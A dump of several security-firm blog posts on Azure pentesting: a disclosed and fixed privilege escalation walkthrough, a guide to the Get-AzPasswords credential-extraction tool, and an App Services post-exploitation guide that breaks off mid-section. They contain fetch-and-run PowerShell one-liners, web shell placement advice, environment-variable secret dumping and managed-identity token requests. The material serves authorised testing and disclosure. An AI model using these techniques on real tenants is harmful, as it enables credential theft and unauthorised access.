[post_title] => CVE-2021-42306 CredManifest: App Registration Certificates Stored in Azure Active Directory [post_excerpt] => The vulnerability, found by NetSPI’s cloud pentesting practice director, Karl Fosaaen, affects any organization that uses Automation Account "Run as" accounts in Azure. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-cloud-vulnerability-credmanifest [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:45 [post_modified_gmt] => 2022-12-16 16:51:45 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26684 [menu_order] => 289 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [13] => WP_Post Object ( [ID] => 26468 [post_author] => 10 [post_date] => 2021-09-14 04:00:29 [post_date_gmt] => 2021-09-14 09:00:29 [post_content] =>

NetSPI Director Karl Fosaaen was featured in a CSO online article called 8 top cloud security certifications:

As companies move more and more of their infrastructure to the cloud, they're forced to shift their approach to security. The security controls you need to put in place for a cloud-based infrastructure are different from those for a traditional datacenter. There are also threats specific to a cloud environment. A mistake could put your data at risk.

It's no surprise that hiring managers are looking for candidates who can demonstrate their cloud security know-how—and a number of companies and organizations have come up with certifications to help candidates set themselves apart. As in many other areas of IT, these certs can help give your career a boost.

But which certification should you pursue? We spoke to a number of IT security pros to get their take on those that are the most widely accepted signals of high-quality candidates. These include cloud security certifications for both relative beginners and advanced practitioners.

Going beyond certifications

All of these certs are good ways to demonstrate your skills to your current or potential future employers — they're "a good way to get your foot in the door at a company doing cloud security and they're good for getting past a resume filter," says Karl Fosaaen, Cloud Practice Director at NetSPI. That said, they certainly aren't a be-all, end-all, and a resume with nothing but certifications on it will not impress anybody.

"Candidates need to be able to show an understanding of how the cloud components work and integrate with each other for a given platform," Fosaaen continues. "Many of the currently available certifications only require people to memorize terminology, so you don't have a guaranteed solid candidate if they simply have a certification. For those hiring on these certifications, make sure that you're going the extra level to make sure the candidates really do understand the cloud providers that your organization uses."

Fosaaen recommends pursuing specific trainings to further burnish your resume, such as the SANS Institute's Cloud Penetration Testing course, BHIS's Breaching The Cloud Perimeter, or his own company's Dark Side Ops Training. Concrete training courses like these can be a great complement to the "book learning" of a certification.

To learn more, read the full article here: https://www.csoonline.com/article/3631530/8-top-cloud-security-certifications.html

[post_title] => CSO: 8 top cloud security certifications [post_excerpt] => NetSPI Director Karl Fosaaen was featured in a CSO online article called 8 top cloud security certifications. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cso-8-top-cloud-security-certifications [to_ping] => [pinged] => [post_modified] => 2023-08-22 09:13:50 [post_modified_gmt] => 2023-08-22 14:13:50 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26468 [menu_order] => 305 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [14] => WP_Post Object ( [ID] => 11855 [post_author] => 10 [post_date] => 2021-09-13 10:00:00 [post_date_gmt] => 2021-09-13 15:00:00 [post_content] =>

TL;DR - This issue has already been fixed, but it was a fairly minor privilege escalation that allowed an Azure AD user to escalate from the Log Analytics Contributor role to a full Subscription Contributor role.

The Log Analytics Contributor Role is intended to be used for reading monitoring data and editing monitoring settings. These rights also include the ability to run extensions on Virtual Machines, read deployment templates, and access keys for Storage accounts.

Based off the role’s previous rights on the Automation Account service (Microsoft.Automation/automationAccounts/*), the role could have been used to escalate privileges to the Subscription Contributor role by modifying existing Automation Accounts that are configured with a Run As account. This issue was reported to Microsoft in 2020 and has since been remediated.

Escalating Azure Permissions

Automation Account Run As accounts are initially configured with Contributor rights on the subscription. Because of this, an attacker with access to the Log Analytics Contributor role could create a new runbook in an existing Automation Account and execute code from the runbook as a Contributor on the subscription.

These Contributor rights would have allowed the attacker to create new resources on the subscription and modify existing resources. This includes Key Vault resources, where the attacker could add their account to the access policies for the vault, granting themselves access to the keys and secrets stored in the vault.

Finally, by exporting the Run As certificate from the Automation Account, an attacker would be able to create a persistent Az (CLI or PowerShell module) login as a subscription Contributor (the Run As account).

Since this issue has already been remediated, we will show how we went about explaining the issue in our Microsoft Security Response Center (MSRC) submission.

Attack Walkthrough

Using an account with the Owner role applied to the subscription (kfosaaen), we created a new Automation Account (LAC-Contributor) with the “Create Azure Run As account” option set to “Yes”. We need to be an Owner on the subscription to create this account, as contributors do not have rights to add the Run As account.

Add Automation Account

Note that the Run As account (LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=) was added to the Azure tenant and is now listed in the subscription IAM tab as a Contributor.

Access Control

In the subscription IAM tab, we assigned the “Log Analytics Contributor” role to an Azure Active Directory user (LogAnalyticsContributor) with no other roles or permissions assigned to the user at the tenant level.

Role added

On a system with the Az PowerShell module installed, we opened a PowerShell console and logged in to the subscription with the Log Analytics Contributor user and the Connect-AzAccount function.

PS C:\temp> Connect-AzAccount
 
Account SubscriptionName TenantId Environment
------- ---------------- -------- -----------
LogAnalyticsContributor kfosaaen 6[REDACTED]2 AzureCloud

Next, we downloaded the MicroBurst tools and imported the module into the PowerShell session.

PS C:\temp> import-module C:\temp\MicroBurst\MicroBurst.psm1
Imported AzureAD MicroBurst functions
Imported MSOnline MicroBurst functions
Imported Misc MicroBurst functions
Imported Azure REST API MicroBurst functions

Using the Get-AZPasswords function in MicroBurst, we collected the Automation Account credentials. This function created a new runbook (iEhLnPSpuysHOZU) in the existing Automation Account that exported the Run As account certificate for the Automation Account.

PS C:\temp> Get-AzPasswords -Verbose 
VERBOSE: Logged In as LogAnalyticsContributor@[REDACTED]
VERBOSE: Getting List of Azure Automation Accounts...
VERBOSE: Getting the RunAs certificate for LAC-Contributor using the iEhLnPSpuysHOZU.ps1 Runbook
VERBOSE: Waiting for the automation job to complete
VERBOSE: Run AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1 (as a local admin) to import the cert and login as the Automation Connection account
VERBOSE: Removing iEhLnPSpuysHOZU runbook from LAC-Contributor Automation Account
VERBOSE: Password Dumping Activities Have Completed

We then used the MicroBurst created script (AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1) to authenticate to the Az PowerShell module as the Run As account for the Automation Account. As we can see in the output below, the account we authenticated as (Client ID - d0c0fac3-13d0-4884-ad72-f7b5439c1271) is the “LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=” account and it has the Contributor role on the subscription.

PS C:\temp> .\AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1
PSParentPath: Microsoft.PowerShell.Security\Certificate::LocalMachine\My
Thumbprint Subject
---------- -------
A0EA38508EEDB78A68B9B0319ED7A311605FF6BB DC=LAC-Contributor_test_7a[REDACTED]b5
Environments : {[AzureChinaCloud, AzureChinaCloud], [AzureCloud, AzureCloud], [AzureGermanCloud, AzureGermanCloud],
[AzureUSGovernment, AzureUSGovernment]}
Context : Microsoft.Azure.Commands.Profile.Models.Core.PSAzureContext

PS C:\temp> Get-AzContext | select Account,Tenant
Account Subscription
------- ------
d0c0fac3-13d0-4884-ad72-f7b5439c1271 7a[REDACTED]b5
PS C:\temp> Get-AzRoleAssignment -ObjectId bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
RoleAssignmentId : /subscriptions/7a[REDACTED]b5/providers/Microsoft.Authorization/roleAssignments/0eb7b73b-39e0-44f5-89fa-d88efc5fe352
Scope : /subscriptions/7a[REDACTED]b5
DisplayName : LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=
SignInName :
RoleDefinitionName : Contributor
RoleDefinitionId : b24988ac-6180-42a0-ab88-20f7382dd24c
ObjectId : bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
ObjectType : ServicePrincipal
CanDelegate : False
Description :
ConditionVersion :
Condition :
LAC Contributor

MSRC Submission Timeline

Microsoft was great to work with on the submission and they were quick to respond to the issue. They have since removed the Automation Accounts permissions from the affected role and updated documentation to reflect the issue.

Custom Azure Automation Contributor Role

Here’s a general timeline of the MSRC reporting process:

  • NetSPI initially reports the issue to Microsoft – 10/15/20
  • MSRC Case 61630 created – 10/19/20
  • Follow up email sent to MSRC – 12/10/20
  • MSRC confirms the behavior is a vulnerability and should be fixed – 12/11/20
  • Multiple back and forth emails to determine disclosure timelines – March-July 2021
  • Microsoft updates the role documentation to address the issue – July 2021
  • NetSPI does initial public disclosure via DEF CON Cloud Village talk – August 2021
  • Microsoft removes Automation Account permissions from the LAC Role – August 2021

Postscript

While this blog doesn’t address how to escalate up from the Log Analytics Contributor role, there are many ways to pivot from the role. Here are some of its other permissions: 

                "actions": [
                    "*/read",
                    "Microsoft.ClassicCompute/virtualMachines/extensions/*",
                    "Microsoft.ClassicStorage/storageAccounts/listKeys/action",
                    "Microsoft.Compute/virtualMachines/extensions/*",
                    "Microsoft.HybridCompute/machines/extensions/write",
                    "Microsoft.Insights/alertRules/*",
                    "Microsoft.Insights/diagnosticSettings/*",
                    "Microsoft.OperationalInsights/*",
                    "Microsoft.OperationsManagement/*",
                    "Microsoft.Resources/deployments/*",
                    "Microsoft.Resources/subscriptions/resourcegroups/deployments/*",
                    "Microsoft.Storage/storageAccounts/listKeys/action",
                    "Microsoft.Support/*"
                ]

More specifically, this role can pivot to Virtual Machines via Custom Script Extensions and list out Storage Account keys. You may be able to make use of a Managed Identity on a VM, or find something interesting in the Storage Account.

Looking for an Azure pentesting partner? Consider NetSPI.

[post_title] => Escalating Azure Privileges with the Log Analytics Contributor Role [post_excerpt] => Learn how cloud pentesting expert Karl Fosaaen found and reported a Microsoft Azure vulnerability that allowed an Azure AD user to escalate from the Log Analytics Contributor role to the full Subscription Contributor role. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => escalating-azure-privileges-with-the-log-analystics-contributor-role [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:24:10 [post_modified_gmt] => 2023-03-16 14:24:10 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11855 [menu_order] => 306 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [15] => WP_Post Object ( [ID] => 26141 [post_author] => 53 [post_date] => 2021-08-13 15:12:35 [post_date_gmt] => 2021-08-13 20:12:35 [post_content] =>
Watch Now

Whether it's the migration of legacy systems or the creation of brand-new applications, many organizations are turning to Microsoft’s Azure cloud as their platform of choice. This brings new challenges for penetration testers who are less familiar with the platform, and now have more attack surfaces to exploit. In an attempt to automate some of the common Azure escalation tasks, the MicroBurst toolkit was created to contain tools for attacking different layers of an Azure tenant. In this talk, we will be focusing on the password extraction functionality included in MicroBurst. We will review many of the places that passwords can hide in Azure, and the ways to manually extract them. For convenience, we will also show how the Get-AzPasswords function can be used to automate the extraction of credentials from an Azure tenant. Finally, we will review a case study on how this tool was recently used to find a critical issue in the Azure permissions model that resulted in a fix from Microsoft.

[wonderplugin_video iframe="https://youtu.be/m1xxLZVtSz0" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Azure Pentesting: Extracting All the Azure Passwords [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-pentesting-extracting-all-the-azure-passwords [to_ping] => [pinged] => [post_modified] => 2023-06-22 20:06:04 [post_modified_gmt] => 2023-06-23 01:06:04 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=26141 [menu_order] => 37 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [16] => WP_Post Object ( [ID] => 11753 [post_author] => 10 [post_date] => 2020-10-22 07:00:26 [post_date_gmt] => 2020-10-22 07:00:26 [post_content] =>

It has been a while since the initial release (August 2018) of the Get-AzurePasswords module within MicroBurst, so I figured it was time to do an overview post that explains how to use each option within the tool. Since each targeted service in the script has a different way of getting credentials, I want users of the tool to really understand how things are working.

For those that just want to jump to information on specific services, here's links to each section:

Additionally, we've renamed the function to Get-AzPasswords to match the PowerShell modules that we're using in the function.

AzureRM Versus Az

As of March 19, 2020, we pushed some changes to MicroBurst to switch the cmdlets over to the Az PowerShell modules (from AzureRM). This was a much needed switch, as the AzureRM modules are being replace by the Az modules.

Along with these updates I also wanted to make some additions to the Get-AzurePasswords functionality. Since we reorganized all of the code in MicroBurst to match up with the related supporting modules (Az, AzureAD, MSOL, etc.), we thought it was important to separate out function names based off of the modules the script was using.

Modules

Going forward, Get-AzurePasswords will still live in the AzureRM folder in MicroBurst, but it will not be updated with any new functionality. Going forward, I highly recommend that everyone switches over to the newly renamed version "Get-AzPasswords" in the Az folder in MicroBurst.

Important Script Usage Note - Some of these functions can make minor temporary changes to an Azure subscription (see Automation Accounts). If you Ctrl+C during the script execution, you may end up with unintended files or changes in your subscription.

I'll cover each of these concerns in the sections below, but have patience when running these functions. I know Azure can have its slow moments, so (in most cases) just give the script a moment to catch up and everything should be good. I haven't been keeping track, but I believe I've lost several months of time waiting for automation runbook jobs to complete.

Function Usage

For each service section, I've noted the script flag that you can use to toggle ("-Keys Y" versus "-Keys N") the collection of that specific service. Running the script with no flags will gather credentials from all services.

Step 1. Import the MicroBurst Module

PS C:\MicroBurst> Import-Module .MicroBurst.psm1
Imported Az MicroBurst functions
Imported AzureAD MicroBurst functions
Imported MSOnline MicroBurst functions
Imported Misc MicroBurst functions
Imported Azure REST API MicroBurst functions

Step 2. Authenticate to the Azure Tenant

PS C:\MicroBurst> Login-AzAccount

Account           SubscriptionName  TenantId                             Environment
-------           ----------------  --------                             -----------
test@example.com  TestSubscription  4712345a-6543-b5s4-a2b2-e01234567895 AzureCloud

Step 3. Gather Passwords

PS C:\MicroBurst> Get-AzPasswords -Verbose
VERBOSE: Logged In as test@example.com
VERBOSE: Getting List of Key Vaults...
VERBOSE:  Exporting items from testingKeys
VERBOSE:   Getting Key value for the testKey Key
VERBOSE:   Getting Secret value for the TestKey Secret
VERBOSE: Getting List of Azure App Services...
VERBOSE:  Profile available for microburst-application
VERBOSE: Getting List of Azure Container Registries...
VERBOSE: Getting List of Storage Accounts...
VERBOSE:  Getting the Storage Account keys for the teststorage account
VERBOSE: Getting List of Azure Automation Accounts...
VERBOSE:  Getting the RunAs certificate for autoadmin using the XZvOYzsuBiGbfqe.ps1 Runbook
VERBOSE:   Waiting for the automation job to complete
VERBOSE:    Run AuthenticateAs-autoadmin-AzureRunAsConnection.ps1 (as a local admin) to import the cert and login as the Automation Connection account
VERBOSE:   Removing XZvOYzsuBiGbfqe runbook from autoadmin Automation Account
VERBOSE:  Getting cleartext credentials for the autoadmin Automation Account
VERBOSE:   Getting cleartext credentials for test using the dOFtWgEXIQLlRfv.ps1 Runbook
VERBOSE:    Waiting for the automation job to complete
VERBOSE:    Removing dOFtWgEXIQLlRfv runbook from autoadmin Automation Account
VERBOSE: Password Dumping Activities Have Completed

*Running this will "Out-GridView" prompt you to select the subscription(s) to gather credentials from.

For easier output management, I'd recommend piping the output to either "Out-GridView" or "Export-CSV".

With that housekeeping out of the way, let's dive into the credentials that we're able to gather with Get-AzPasswords.

Key Vaults (-Keys Y)

Azure Key Vaults are Microsoft’s solution for storing sensitive data (Keys, Passwords/Secrets, Certs) in the Azure cloud. Inherently, Key Vaults are great sources for finding credential data. If you have a user with the correct rights, you should be able to read data out of the key stores.

Vault access is controlled by the Access Policies in each vault, but any users with Contributor rights are able to give themselves access to a Key Vault. Get-AzPasswords will not modify any Key Vault Access Policies, but you could give your account read permissions on the vault if you really needed to read a key.

An example Key Vault Secret:

Keyvault

Get-AzPasswords will export all of the secrets in cleartext, along with any certificates. You also have the option to save the certificate files locally with the "-ExportCerts Y" flag.

Sample Output:

Type : Key
Name : DiskKey
Username : N/A
Value : {"kid":"https://notArealVault.vault.azure.net/keys/DiskKey/63abcdefghijklmnop39","kty ":"RSA","key_ops":["sign","verify","wrapKey","unwrapKey","encrypt","decrypt"],"n":"v[REDACTED]w","e":"AQAB"}
PublishURL : N/A
Created : 5/19/2020 5:20:12 PM
Updated : 5/19/2020 5:20:12 PM
Enabled : True
Content Type : N/A
Vault : notArealVault
Subscription : NotARealSubscription

Type : Secret
Name : TestKey
Username : N/A
Value : Karl'sPassword
PublishURL : N/A
Created : 3/7/2019 9:28:37 PM
Updated : 3/7/2019 9:28:37 PM
Enabled : True
Content Type : Password
Vault : notArealVault
Subscription : NotARealSubscription

Finally, access to the Key Vaults may be restricted by network, so you may need to run this from an Azure VM on the subscription, or from an IP in the approved "Private endpoint and selected networks" list. These settings can be found under the Networking tab in the Azure portal.

Alternatively, you may need to use an automation account "Run As" account to request the keys. Steps to complete that process are outlined here.

App Services (-AppServices Y)

Azure App Services are Microsoft’s option for rapid application deployment. Applications can be spun up quickly using app services and the configurations (passwords) are pushed to the applications via the App Services profiles.

In the portal, the App Services deployment passwords are typically found in the “Publish Profile” link that can be found in the top navigation bar within the App Services section. Any user with contributor rights to the application should be able to access this profile.

Appservices

These publish profiles will contain Web and FTP credentials that can be used to get access to the App Service's files. In addition to that, any stored connection strings should also be available in the file. All available profile credentials are all parsed by Get-AzPasswords, so it's easy to gather credentials for multiple App Services applications at once.

Sample Output:

Type         : AppServiceConfig
Name         : appServicesApplication - Web Deploy
Username     : $appServicesApplication
Value        : dS[REDACTED]jM
PublishURL   : appServicesApplication.scm.azurewebsites.net:443
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Password
Vault        : N/A
Subscription : NotARealSubscription

Type         : AppServiceConfig
Name         : appServicesApplication - FTP
Username     : appServicesApplication$appServicesApplication
Value        : dS[REDACTED]jM
PublishURL   : ftp://appServicesApplication.ftp.azurewebsites.windows.net/site/wwwroot
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Password
Vault        : N/A
Subscription : NotARealSubscription

Type : AppServiceConfig
Name : appServicesApplication-Custom-ConnectionString
Username : N/A
Value : metadata=res://*/Models.appServicesApplication.csdl|res://*/Models.appServicesApplication.ssdl|res://*/Models.appServicesApplication.msl;provider=System.Data.SqlClient;provider connection string="Data Source=abcde.database.windows.net;Initial Catalog=app_Enterprise_Prod;Persist Security Info=True;User ID=psqladmin;Password=somepassword9" 
PublishURL : N/A
Created : N/A
Updated : N/A
Enabled : N/A
Content Type : ConnectionString
Vault : N/A
Subscription : NotARealSubscription

Potential next steps for App Services have been outlined in another NetSPI blog post here.

Automation Accounts (-AutomationAccounts Y)

Automation Accounts are one of the ways that you can automate jobs and routine tasks within Azure. These tasks (Runbooks) are frequently run with stored credentials, or with the service account (Run As "Connections") tied to the Automation Account.

Automation

Both of these credential types can be returned with Get-AzPasswords and can potentially allow for privilege escalation. In order to gather these credentials from the Automation Accounts, we need to create new runbooks that will cast the credentials out to variables that are then printed to the runbook job output.

To protect these credentials in the output, we've implemented an encryption scheme in Get-AzPasswords that encrypts the job output.

Enccreds

The Run As certificates (covered in another blog) can then be used to authenticate (run the AuthenticateAs PS1 script) from your testing system as the stored Run As connection.

Authas

Any stored credentials may have a variety of uses, but I've frequently seen domain accounts being stored here, so that can lead to some interesting lateral movement options.

Sample Output:

Type : Azure Automation Account
Name : kfosaaen
Username : test
Value : testPassword
PublishURL : N/A
Created : N/A
Updated : N/A
Enabled : N/A
Content Type : Password
Vault : N/A
Subscription : NotARealSubscription

As a secondary note here, you can also request bearer tokens for the Run As automation accounts from a custom runbook. I cover the process in this blog post, but I think it's worth noting here, since it's not included in Get-AzPasswords, but it is an additional way to get a credential from an Automation Account.

And one final note on gathering credentials from Automation Accounts. It was noted above, but sometimes Azure Automation Accounts can be slow to respond. If you're having issues getting a runbook to run and cancel the function execution before it completes, you will need to manually go in and clean up the runbooks that were created as part of the function execution.

Runbook

These will always be named with a 15-character random string of letters (IE: lwVSNvWYpPXCcDd). You will also have local files in your execution directory to clean up as well, and they will have the same name as the ones that were uploaded for execution.

Storage Account Keys (-StorageAccounts Y)

Storage Accounts are the multipurpose (Public/Private files, tables, queues) service for storing data in an Azure subscription. This section is pretty simple compared to the previous ones, but gathering the account keys is an easy way to maintain persistence in a sensitive data store. These keys can be used with the Azure storage explorer application to remotely mount storage accounts.

Storage

These access keys can easily be cycled, but if you're looking for persistence in a Storage Account, these would be your best bet. Additionally, if you're modifying Cloud Shell files for escalation/persistence, I'd recommend holding on to a copy of these keys for any Cloud Shell storage accounts.

Sample Output:

Type         : Storage Account
Name         : notArealStorageAccount
Username     : key1
Value        : W84[REDACTED]==
PublishURL   : N/A
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Key
Vault        : N/A
Subscription : NotARealSubscription

Azure Container Registries (-ACR Y)

Azure Container Registries are used in Azure to manage Docker images for use within Azure Kubernetes Service (AKS) or as container instances (either in Azure or elsewhere). More often than not, we will find keys and credentials stored in these container images.

In order to authenticate to the repositories, you can either use the AZ CLI with AzureAD credentials, or there can be an "Admin user". If you have AzureAD user rights to pull the admin password for a container registry, you should already have rights to authenticate to the repositories with the AZ CLI, but if an Admin user is enabled for the registry, this user could then be used for persistence when you lose access to the initial AzureAD user.

Container

Fun Fact - Any AzureAD user with "Reader" permissions on the Container Registry is able to connect to the repositories and pull images down with Docker.

For more information on using these credentials, here's another NetSPI blog.

Conclusion

There was a lot of ground to cover here, but hopefully this does a good job of explaining all of the functionality available in Get-AzPasswords. It's worth noting that most of this functionality relies on your AzureAD user having Contributor IAM rights on the applicable service. While some may argue that Contributor access is equivalent to admin in a subscription, I would argue that most subscriptions primarily consist of Contributor users.

If there are any sources for Azure passwords that you would like to see added to Get-AzPasswords, feel free to make a pull request on the MicroBurst GitHub repository.

[post_title] => A Beginners Guide to Gathering Azure Passwords [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => a-beginners-guide-to-gathering-azure-passwords [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:26:00 [post_modified_gmt] => 2023-03-16 14:26:00 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11753 [menu_order] => 399 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [17] => WP_Post Object ( [ID] => 11728 [post_author] => 10 [post_date] => 2020-08-17 07:00:59 [post_date_gmt] => 2020-08-17 07:00:59 [post_content] =>

We test a lot of web applications at NetSPI, and as everyone continues to move their operations into the cloud, we're running into more instances of applications being run on Azure App Services.

Top

Whenever we run into an App Services application with a serious vulnerability, I'll frequently get a ping asking about next steps to take in an Azure environment. This blog will hopefully answer some of those questions.

Initial Access

We will be primarily talking about command execution on an App Services host. There are plenty of other vulnerabilities (SQLi, SSRF, etc.) that we could put into the context of Azure App Services, but we'll save those for another blog.

For our command injection examples, we'll assume that you've used one of the following methods to execute commands on a system:

  • An uploaded web shell
  • Unintended CMD injection via an application issue
  • Intended CMD Injection through application functionality

Alternatively, keep in mind that Azure Portal Access (with an account with Contributor rights on an app) also allows you to run commands from the App Services Console. This will be important if there's a higher privileged Managed Identity in use by the app, and we want to use this to escalate Azure permissions.

Cmdsql

For the sake of simplicity, we'll also assume that this is a relatively clean command injection (See Web Shell), where you can easily see the results of your commands. If we want to get really complicated, we could talk about using side channels to exfiltrate command results, but that's also for another blog.

Azure "App Services"

To further complicate matters, Azure App Services encompasses "Function Apps" and "App Service Apps". There are some key differences between the two, but for the purposes of this blog, we'll consider them to be the same. Additionally, there are Linux and Windows options for both, so we'll try to cover options for those as well.

If you want to follow along with your own existing App Services app, you can use the Console (or SSH) section in the Development Tools section of the Azure Portal for your App Services app.

Appservices

Choose Your Own Adventure

With command execution on the App Services host, there are a couple of paths that you can take:

Looking Locally

First things first, this is an application server, so you might want to look at the application files.

  • The application source code files can (typically) be found at the %DEPLOYMENT_SOURCE%
  • The actual working files for the application can (typically) be found at %DEPLOYMENT_TARGET%
  • Or /home/site/wwwroot if you're working with a Linux system
Locally

If you're operating on a bare bones shell at this point, I would recommend pulling down an appropriate web shell to your %DEPLOYMENT_TARGET% (or /home/site/wwwroot) directory. This will allow you to upgrade your shell and allow you to better explore the host.

Just remember, this app server is likely facing the internet and a web shell without a password easily becomes someone else's web shell.

Within the source code files, you can also look for common application configuration files (web.config, etc.) that might contain additional secrets that you could use to pivot through to other services (as we'll see later in the blog).

Looking at the Environment

On an App Services host, most of your configuration variables will be available as environmental variables on the host. These variables will most likely contain keys that we can use to pivot to other Azure services in the subscription.

Since you're most likely to have a cmd.exe shell, you can just use the "set" command to list out all of the environmental variables. It will look like this (without the redactions):

Env Win

If you're using PowerShell for your command execution, you can use the "dir env: | ft -Wrap " command to do the same. Make sure that you're piping to "ft -wrap" as that will allow the full text values to be returned without being truncated.

Alternatively, if you're in a Linux shell, you can use the "printenv" command to accomplish the same:

Env Linux

Now that we (hopefully) have some connection strings for Azure services, we can start getting into other services.

Accessing Storage Accounts

If you're able to find an Azure Storage Account connection string, you should be able to remotely mount that storage account with the Azure Storage Explorer.

Here are a couple of common Windows environmental variables that hold those connection strings:

  • APPSETTING_AzureWebJobsStorage
  • APPSETTING_WEBSITE_CONTENTAZUREFILECONNECTIONSTRING
  • AzureWebJobsStorage
  • WEBSITE_CONTENTAZUREFILECONNECTIONSTRING

Additionally, you may find these strings in the application configuration files. Keep an eye out for any config files containing "core.windows.net", storage, blob, or file in them.

Using the Azure Storage Explorer, copy the Storage Account connection string and use that to add a new Storage Account.

Storage

Now that you have access to the Storage Account, you should be able to see any files that the application has rights to.

Storage


Accessing Azure SQL Databases

Similar to the Storage Accounts, you may find connection strings for Azure SQL in the configuration files or environmental variables. Most Azure SQL servers that I encounter have access locked down to specific IP ranges, so you may not be able to remotely access the servers from the internet. Every once in a while, we'll find a server with 0.0.0.0-255.255.255.255 in their allowed list, but that's pretty rare.

Azuresql

Since direct SQL access from the internet is unlikely, we will need an alternative that works from within the App Services host.

Azure SQL from Windows:

For Windows, we can plug in the values from our connection string and make use of PowerUpSQL to access Azure SQL databases.

Confirm Access to the "sql-test" Database on the "netspi-test" Azure SQL server:

D:homesitewwwroot>powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1'); Get-SQLConnectionTest -Instance 'netspi-test.database.windows.net' -Database sql-test -Username MyUser -Password 123Password456 | ft -wrap"


ComputerName                     Instance                         Status    
------------                     --------                         ------    
netspi-test.database.windows.net netspi-test.database.windows.net Accessible

Execute a query on the "sql-test" Database on the "netspi-test" Azure SQL server:

D:homesitewwwroot>powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1'); Get-SQLQuery -Instance 'netspi-test.database.windows.net' -Database sql-test -Username MyUser -Password 123Password456 -Query 'select @@version' | ft -wrap"


Column1                                                                        
-------                                                                        
Microsoft SQL Azure (RTM) - 12.0.2000.8                                        
    Jul 31 2020 08:26:29                                                          
    Copyright (C) 2019 Microsoft Corporation

From here, you can modify the query to search the database for more information.

For more ideas on pivoting via Azure SQL, check out the PowerUpSQL GitHub repository and Scott Sutherland's NetSPI blog author page.

Azure SQL from Linux:

For Linux hosts, you will need to check the stack that you're running (Node, Python, PHP, .NET Core, Ruby, or Java). In your shell, "printenv | grep -i version" and look for things like RUBY_VERSION or PYTHON_VERSION.

For simplicity, we will assume that we are set up with the Python Stack and pyodbc is already installed as a module. For this, we will use a pretty basic Python script to query the database.

Other stacks will (most likely) require some different scripting or clients that are more compatible with the provided stack, but we'll save that for another blog.

Execute a query on the "sql-test" Database on the "netspi-test" Azure SQL server:

root@567327e35d3c:/home# cat sqlQuery.py
import pyodbc
server = 'netspi-test.database.windows.net'
database = 'sql-test'
username = 'MyUser'
password = '123Password456'
driver= '{ODBC Driver 17 for SQL Server}'

with pyodbc.connect('DRIVER='+driver+';SERVER='+server+';PORT=1433;DATABASE='+database+';UID='+username+';PWD='+ password) as conn:
        with conn.cursor() as cursor:
                cursor.execute("SELECT @@version")
                row = cursor.fetchone()
                while row:
                        print (str(row[0]))
                        row = cursor.fetchone()

root@567327e35d3c:/home# python sqlQuery.py
Microsoft SQL Azure (RTM) - 12.0.2000.8
        Jul 31 2020 08:26:29
        Copyright (C) 2019 Microsoft Corporation

Your best bet for deploying this script to the host is probably downloading it from a remote source. Trying to manually edit Python from the Azure web based SSH connection is not going to be a fun time.

More generally, trying to do much of anything in these Linux hosts may be tricky. For this blog, I was working in a sample app that I spun up for myself and immediately ran into multiple issues, so your mileage may vary here.

For more information about using Python with Azure SQL, check out Microsoft's documentation.

Abusing Managed Identities to Get Tokens

An application/VM/etc. can be configured with a Managed Identity that is given rights to specific resources in the subscription via IAM policies. This is a handy way of granting access to resources, but it can be used for lateral movement and privilege escalation.

We've previously covered Managed Identities for VMs on the Azure Privilege Escalation Using Managed Identities blog post. If the application is configured with a Managed Identity, you may be able to use the privileges of that identity to pivot to other resources in the subscription and potentially escalate privileges in the subscription/tenant.

In the next section, we'll cover getting tokens for a Managed Identity that can be used with the management.azure.com REST APIs to determine the resources that your identity has access to.

Getting Tokens

There are two different ways to get tokens out of your App Services application. Each of these depend on different versions of the REST API, so depending on the environmental variables that you have at your disposal, you may need to choose one or the other.

*Note that if you're following along in the Console, the Windows commands will require writing that token to a file first, as Curl doesn't play nice with the Console output.

Windows:

  • MSI Secret Option:
curl "%MSI_ENDPOINT%?resource=https://management.azure.com&api-version=2017-09-01" -H secret:%MSI_SECRET% -o token.txt
type token.txt
